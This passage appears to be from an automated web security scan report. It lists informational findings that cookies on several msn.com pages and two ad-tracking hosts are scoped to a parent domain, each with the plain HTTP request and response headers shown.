MC1=V=3&GUID=0837e2bff64e482a8ade273aa6bc5059; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4B7DFBB6BC2C4FD9B3731FD23B5B7AC3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/New-Superman-chosen.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:48 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0837e2bff64e482a8ade273aa6bc5059; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4B7DFBB6BC2C4FD9B3731FD23B5B7AC3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:48 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.248. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=dc5ede9cf01f4a1d8f38f66ec7f0ee46; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=366EF7F6FBC54B3EAB190688EB1E8AD7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Ozzy-cancels-Reno-show.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=dc5ede9cf01f4a1d8f38f66ec7f0ee46; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=366EF7F6FBC54B3EAB190688EB1E8AD7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:47 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.249. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/African-American-History.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=e1af1217f0b44161824e573249566413; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D1B618A0FF6A47629CB585CEFDE91753; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/African-American-History.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e1af1217f0b44161824e573249566413; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D1B618A0FF6A47629CB585CEFDE91753; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.250. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Best-home-remedies.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ffb0ad538e584c5ba09fbbb9e9181fc9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C82C0F468D0147E1BC70C15DCFD78642; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Best-home-remedies.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:46 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ffb0ad538e584c5ba09fbbb9e9181fc9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C82C0F468D0147E1BC70C15DCFD78642; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.251. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=68f08c2708d64e29be8348cbb961e750; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=9F16C447874D438CB21CE2DD3C818D30; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/January-2011-quotes-of-the-month.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:46 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=68f08c2708d64e29be8348cbb961e750; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9F16C447874D438CB21CE2DD3C818D30; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:46 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.252. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=049adc0a2f954bcdae024e6512e78500; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A6C7330F7D414E7A9C40DFAA3A85381F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:44 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=049adc0a2f954bcdae024e6512e78500; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A6C7330F7D414E7A9C40DFAA3A85381F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.253. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=8d84d7479cf84091870cb3dce77d6db2; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A675B0FE00124BA682A85CAD9ED64F43; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:44 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8d84d7479cf84091870cb3dce77d6db2; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A675B0FE00124BA682A85CAD9ED64F43; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:44 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.254. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=317c8099fa3e4490afcb903b3fe5bbba; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E96C99ED5C4A494298EF441C47EDA3C2; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=317c8099fa3e4490afcb903b3fe5bbba; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E96C99ED5C4A494298EF441C47EDA3C2; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.255. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ec4f555d8e624b82a3d84cc2ec546076; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=22BC3CB70C554EF0BD773636DE0E5BF8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ec4f555d8e624b82a3d84cc2ec546076; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=22BC3CB70C554EF0BD773636DE0E5BF8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.256. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=d0fb5b01c3b841a8918659fa068cda64; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E80A5234DFEE4ED5BC4DFFA52099EB73; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Sled-dogs-slaughtered.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d0fb5b01c3b841a8918659fa068cda64; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E80A5234DFEE4ED5BC4DFFA52099EB73; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.257. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=61a54a39f746415393b8f1d36e745375; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5884B61259D8400AAD004671E5FA168C; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=61a54a39f746415393b8f1d36e745375; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5884B61259D8400AAD004671E5FA168C; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.258. http://specials.msn.com/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=20824d93a5554284a5a17448fb79a5b8; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E05C380373A7429F93DA9DA49BC1BAD1; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=20824d93a5554284a5a17448fb79a5b8; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E05C380373A7429F93DA9DA49BC1BAD1; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.259. http://specials.msn.com/alphabet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/alphabet.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3c3f37d8deb548dc89c09dac5c3d402b; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=B6BA7A76CD8F4E79AD3497DBAAB626A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3c3f37d8deb548dc89c09dac5c3d402b; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B6BA7A76CD8F4E79AD3497DBAAB626A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 25427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.260. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid=4d497b51-ab59-519e-20fe-d56be81950af; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT
ts=1296661329; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-n1a pid 0x12c2 4802
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Wed, 02 Feb 2011 15:42:09 GMT
Location: http://sync.mathtag.com/sync/img?mm_bnc
Etag: 4d497b51-ab59-519e-20fe-d56be81950af
Connection: close
Set-Cookie: uuid=4d497b51-ab59-519e-20fe-d56be81950af; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT
Set-Cookie: ts=1296661329; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:42:09 GMT
Content-Length: 0

11.261. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=219&campID=67677&crID=87798&auctionID=12966596281452839-87798&cost=0.3868&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
